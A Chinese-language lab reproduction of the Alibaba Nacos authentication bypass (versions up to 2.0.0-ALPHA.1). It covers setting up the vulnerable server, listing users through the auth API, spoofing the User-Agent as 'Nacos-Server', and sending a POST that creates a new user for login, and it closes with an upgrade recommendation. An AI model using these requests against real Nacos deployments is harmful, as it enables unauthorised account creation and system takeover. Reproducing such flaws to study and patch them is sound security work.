0x0****0****简介

Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集，帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。

Alibaba Nacos权限认证绕过漏洞复现

0x01漏洞概述

Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的认证绕过漏洞。通过该漏洞，攻击者可以进行任意操作，包括创建新用户并进行登录后操作。

0x02影响版本

Nacos <= 2.0.0-ALPHA.1

0x03环境搭建

1、在Nacos的GitHub项目地址下载nacos2.0.0-ALPHA.1版本的，下载地址：

wget https://github.com/alibaba/nacos/releases/tag/2.0.0-ALPHA.1

Alibaba Nacos权限认证绕过漏洞复现

2.解压下载的安装，进入bin目录运行启动 //启动需要java8环境

tar -zxvf nacos-server-2.0.0-ALPHA.1.tar.gz cd nacos/bin ./startup.sh -m standalone

Alibaba Nacos权限认证绕过漏洞复现

3、在浏览访问http://your-ip:8488/nacos，搭建成功 //默认账号密码为：nacos/nacos

Alibaba Nacos权限认证绕过漏洞复现

0x04漏洞复现

1、在url处添加访问一下网址即可查看到用户列表

/nacos/v1/auth/users?pageNo=1&pageSize=100

Alibaba Nacos权限认证绕过漏洞复现

2、访问以下链接并使用burp抓包，然后把get请求改为post，把修改User-Agent头改为Nacos-Server

http://your-ip:8848/nacos/v1/auth/users

Alibaba Nacos权限认证绕过漏洞复现

3、构造数据包添加一个demo用户，然后发送POST请求，返回为200，表示创建用户成功

username=demo&password=demo

Alibaba Nacos权限认证绕过漏洞复现

4、回到登录界面，使用添加的账号密码进行登录，可以看到登录成功

Alibaba Nacos权限认证绕过漏洞复现

0x05修复建议

1、官方已发布安全版本，建议下载或升级至最新版本